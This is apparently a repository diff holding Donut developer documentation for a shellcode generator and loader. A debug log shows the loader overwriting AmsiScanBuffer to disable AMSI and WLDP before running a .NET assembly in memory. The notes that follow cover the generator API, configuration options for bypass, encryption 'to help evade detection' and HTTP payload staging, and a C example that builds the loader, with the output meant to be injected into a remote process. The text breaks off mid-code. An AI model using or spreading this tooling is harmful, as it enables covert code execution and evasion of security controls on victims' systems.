436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
+911
-0
docs/devnotes.md less more
0
1 <html>
2 <head>
3 <meta charset="utf-8">
4 </head>
5 <body>
6
7 <h2>Table of contents</h2>
8
9 <ol>
10 <li><a href="#intro">Introduction</a></li>
11 <li><a href="#api">Donut API</a></li>
12 <li><a href="#config">Donut Configuration</a></li>
13 <li><a href="#static">Static Example</a></li>
14 <li><a href="#dynamic">Dynamic Example</a></li>
15 <li><a href="#com">Donut Components</a></li>
16 <li><a href="#instance">Donut Instance</a></li>
17 <li><a href="#module">Donut Module</a></li>
18 <li><a href="#hashing">Win32 API Hashing</a></li>
19 <li><a href="#encryption">Symmetric Encryption</a></li>
20 <li><a href="#bypass">Bypasses for AMSI/WLDP</a></li>
21 <li><a href="#debug">Debugging The Generator and Loader</a></li>
22 <li><a href="#loader">Extending The Loader</a></li>
23 </ol>
24
25 <h2 id="intro">1. Introduction</h2>
26
27 <p>This document contains information useful to developers that want to integrate Donut into their own project or write their own generator in a different language. Static and dynamic examples in C are provided for Windows and Linux. There's also information about the internals of the generator and loader such as data structures, the hash algorithm for resolving API, how bypassing AMSI and WLDP works, the symmetric encryption, debugging the generator and loader. Finally, there's also some information on how to extend functionality of the loader itself.</p>
28
29 <h2 id="api">2. Donut API</h2>
30
31 <p>Shared/dynamic and static libraries for both Windows and Linux provide access to three API.</p>
32
33 <ol>
34
35 <li><code>int DonutCreate(PDONUT_CONFIG)</code></li>
36 <p>Builds the Donut shellcode/loader using settings stored in a <code>DONUT_CONFIG</code> structure.</p>
37
38 <li><code>int DonutDelete(PDONUT_CONFIG)</code></li>
39 <p>Releases any resources allocated by a successful call to <code>DonutCreate</code>.</p>
40
41 <li><code>const char* DonutError(int error)</code></li>
42 <p>Returns a description for an error code returned by <code>DonutCreate</code>.</p>
43
44 </ol>
45
46 <p>The Donut project already contains a generator in C. <a href="https://twitter.com/nixbyte">nixbyte</a> has written <a href="https://github.com/n1xbyte/donutCS">a generator in C#</a>. awgh has written <a href="https://github.com/Binject/go-donut/">a generator in Go</a> and <a href="https://twitter.com/byt3bl33d3r">byt3bl33d3r</a> has written a Python module already included with the source.</p>
47
48 <h2 id="config">3. Donut Configuration</h2>
49
50 <p>The minimum configuration required to build the loader is a path to a VBS/JS/EXE/DLL file that will be executed in-memory. If the file is a .NET DLL, a class and method are required. If the module will be stored on a HTTP server, a URL is required. The following structure is declared in donut.h and should be zero initialized prior to setting any member.</p>
51
52 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
53 uint32_t len<span style='color:#808030; '>,</span> zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original length of input file and compressed length</span>
54 <span style='color:#696969; '>// general / misc options for loader</span>
55 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture</span>
56 <span style='color:#800000; font-weight:bold; '>int</span> bypass<span style='color:#800080; '>;</span> <span style='color:#696969; '>// bypass option for AMSI/WDLP</span>
57 <span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine to use when compressing file via RtlCompressBuffer</span>
58 <span style='color:#800000; font-weight:bold; '>int</span> entropy<span style='color:#800080; '>;</span> <span style='color:#696969; '>// entropy/encryption level</span>
59 <span style='color:#800000; font-weight:bold; '>int</span> format<span style='color:#800080; '>;</span> <span style='color:#696969; '>// output format for loader</span>
60 <span style='color:#800000; font-weight:bold; '>int</span> exit_opt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// return to caller or invoke RtlExitUserProcess to terminate the host process</span>
61 <span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API</span>
62 uint64_t oep<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original entrypoint of target host file</span>
63
64 <span style='color:#696969; '>// files in/out</span>
65 <span style='color:#800000; font-weight:bold; '>char</span> input<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of input file to read and load in-memory</span>
66 <span style='color:#800000; font-weight:bold; '>char</span> output<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of output file to save loader</span>
67
68 <span style='color:#696969; '>// .NET stuff</span>
69 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use for CLR</span>
70 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for .NET DLL/EXE</span>
71 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class with optional namespace for .NET DLL</span>
72 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method or DLL function to invoke for .NET DLL and unmanaged DLL</span>
73
74 <span style='color:#696969; '>// command line for DLL/EXE</span>
75 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line to use for unmanaged DLL/EXE and .NET DLL/EXE</span>
76 <span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// param is passed to DLL function without converting to unicode</span>
77
78 <span style='color:#696969; '>// HTTP/DNS staging information</span>
79 <span style='color:#800000; font-weight:bold; '>char</span> server<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be stored on remote HTTP server or DNS server</span>
80 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk for http stager</span>
81
82 <span style='color:#696969; '>// DONUT_MODULE</span>
83 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// VBS/JS/DLL/EXE</span>
84 <span style='color:#800000; font-weight:bold; '>int</span> mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
85 DONUT_MODULE <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_MODULE</span>
86
87 <span style='color:#696969; '>// DONUT_INSTANCE</span>
88 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_EMBED or DONUT_INSTANCE_HTTP</span>
89 <span style='color:#800000; font-weight:bold; '>int</span> inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
90 DONUT_INSTANCE <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_INSTANCE</span>
91
92 <span style='color:#696969; '>// shellcode generated from configuration</span>
93 <span style='color:#800000; font-weight:bold; '>int</span> pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of loader/shellcode</span>
94 <span style='color:#800000; font-weight:bold; '>void</span><span style='color:#808030; '>*</span> pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to loader/shellcode</span>
95 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
96 </pre>
97
98 <p>The following table provides a description of each member.</p>
99
100 <table border="1">
101 <tr>
102 <th>Member</th>
103 <th>Description</th>
104 </tr>
105 <tr>
106 <td><code>len, zlen</code></td>
107 <td><var>len</var> holds the length of the file to execute in-memory. If compression is used, <var>zlen</var> will hold the length of file compressed.</td>
108 </tr>
109 <tr>
110 <td><code>arch</code></td>
111 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
112 </tr>
113 <tr>
114 <td><code>bypass</code></td>
115 <td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are <code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. <code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. <code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
116 </tr>
117 <tr>
118 <td><code>compress</code></td>
119 <td>Indicates if the input file should be compressed. Available engines are <code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports <code>DONUT_COMPRESS_LZNT1</code>, <code>DONUT_COMPRESS_XPRESS</code> and <code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
120 </tr>
121 <tr>
122 <td><code>entropy</code></td>
123 <td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are <code>DONUT_ENTROPY_NONE</code>, <code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and <code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
124 </tr>
125 <tr>
126 <td><code>format</code></td>
127 <td>Specifies the output format for the shellcode loader. Supported formats are <code>DONUT_FORMAT_BINARY</code>, <code>DONUT_FORMAT_BASE64</code>, <code>DONUT_FORMAT_RUBY</code>, <code>DONUT_FORMAT_C</code>, <code>DONUT_FORMAT_PYTHON</code>, <code>DONUT_FORMAT_POWERSHELL</code>, <code>DONUT_FORMAT_CSHARP</code> and <code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
128 </tr>
129 <tr>
130 <td><code>exit_opt</code></td>
131 <td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Set this to <code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API.</td>
132 </tr>
133 <tr>
134 <td><code>thread</code></td>
135 <td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
136 </tr>
137 <tr>
138 <td><code>oep</code></td>
139 <td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
140 </tr>
141
142 <tr>
143 <td><code>input</code></td>
144 <td>The path of file to execute in-memory. VBS/JS/EXE/DLL files are supported.</td>
145 </tr>
146 <tr>
147 <td><code>output</code></td>
148 <td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
149 </tr>
150
151 <tr>
152 <td><code>runtime</code></td>
153 <td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
154 </tr>
155 <tr>
156 <td><code>domain</code></td>
157 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
158 </tr>
159 <tr>
160 <td><code>cls</code></td>
161 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
162 </tr>
163 <tr>
164 <td><code>method</code></td>
165 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
166 </tr>
167
168 <tr>
169 <td><code>param</code></td>
170 <td>String with a list of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
171 </tr>
172 <tr>
173 <td><code>unicode</code></td>
174 <td>By default, the <code>param</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
175 </tr>
176
177 <tr>
178 <td><code>server</code></td>
179 <td>If the instance <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
180 </tr>
181
182 <tr>
183 <td><code>modname</code></td>
184 <td>If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
185 </tr>
186 <tr>
187 <td><code>mod_type</code></td>
188 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
189 </tr>
190 <tr>
191 <td><code>mod_len</code></td>
192 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
193 </tr>
194 <tr>
195 <td><code>mod</code></td>
196 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
197 </tr>
198
199 <tr>
200 <td><code>inst_type</code></td>
201 <td><code>DONUT_INSTANCE_EMBED</code> indicates a self-contained payload which means the file is embedded. <code>DONUT_INSTANCE_HTTP</code> indicates the file is stored on a remote HTTP server.</td>
202 </tr>
203 <tr>
204 <td><code>inst_len</code></td>
205 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
206 </tr>
207 <tr>
208 <td><code>inst</code></td>
209 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
210 </tr>
211
212 <tr>
213 <td><code>pic_len</code></td>
214 <td>The size of data pointed to by <code>pic</code>.</td>
215 </tr>
216 <tr>
217 <td><code>pic</code></td>
218 <td>Points to the loader/shellcode. This should be injected into a remote process.</td>
219 </tr>
220 </table>
221
222 <h2 id="static">4. Static Example</h2>
223
224 <p>The following is linked with the static library donut.lib on Windows or donut.a on Linux.</p>
225
226 <pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
227
228 <span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
229 DONUT_CONFIG c<span style='color:#800080; '>;</span>
230 <span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
231 <span style='color:#603000; '>FILE</span> <span style='color:#808030; '>*</span>out<span style='color:#800080; '>;</span>
232
233 <span style='color:#696969; '>// need at least a file</span>
234 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
235 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_static &lt;EXE></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
236 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
237 <span style='color:#800080; '>}</span>
238
239 <span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
240
241 <span style='color:#696969; '>// copy input file</span>
242 <span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
243
244 <span style='color:#696969; '>// default settings</span>
245 c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
246 c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
247 c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
248 c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
249 c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
250 c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
251 c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
252 c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
253 c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
254
255 <span style='color:#696969; '>// generate the shellcode</span>
256 err <span style='color:#808030; '>=</span> DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
257 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
258 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
259 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
260 <span style='color:#800080; '>}</span>
261
262 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
263
264 DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
265 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
266 <span style='color:#800080; '>}</span>
267 </pre>
268
269 <h2 id="dynamic">5. Dynamic Example</h2>
270
271 <p>This example requires access to donut.dll on Windows or donut.so on Linux.</p>
272
273 <pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
274
275 <span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
276 DONUT_CONFIG c<span style='color:#800080; '>;</span>
277 <span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
278
279 <span style='color:#696969; '>// function pointers</span>
280 DonutCreate_t _DonutCreate<span style='color:#800080; '>;</span>
281 DonutDelete_t _DonutDelete<span style='color:#800080; '>;</span>
282 DonutError_t _DonutError<span style='color:#800080; '>;</span>
283
284 <span style='color:#696969; '>// need at least a file</span>
285 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
286 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_dynamic &lt;file></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
287 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
288 <span style='color:#800080; '>}</span>
289
290 <span style='color:#696969; '>// try load donut.dll or donut.so</span>
291 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>if</span><span style='color:#004a43; '> </span><span style='color:#004a43; '>defined</span><span style='color:#808030; '>(</span><span style='color:#004a43; '>WINDOWS</span><span style='color:#808030; '>)</span>
292 <span style='color:#603000; '>HMODULE</span> m <span style='color:#808030; '>=</span> <span style='color:#400000; '>LoadLibrary</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.dll</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
293 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
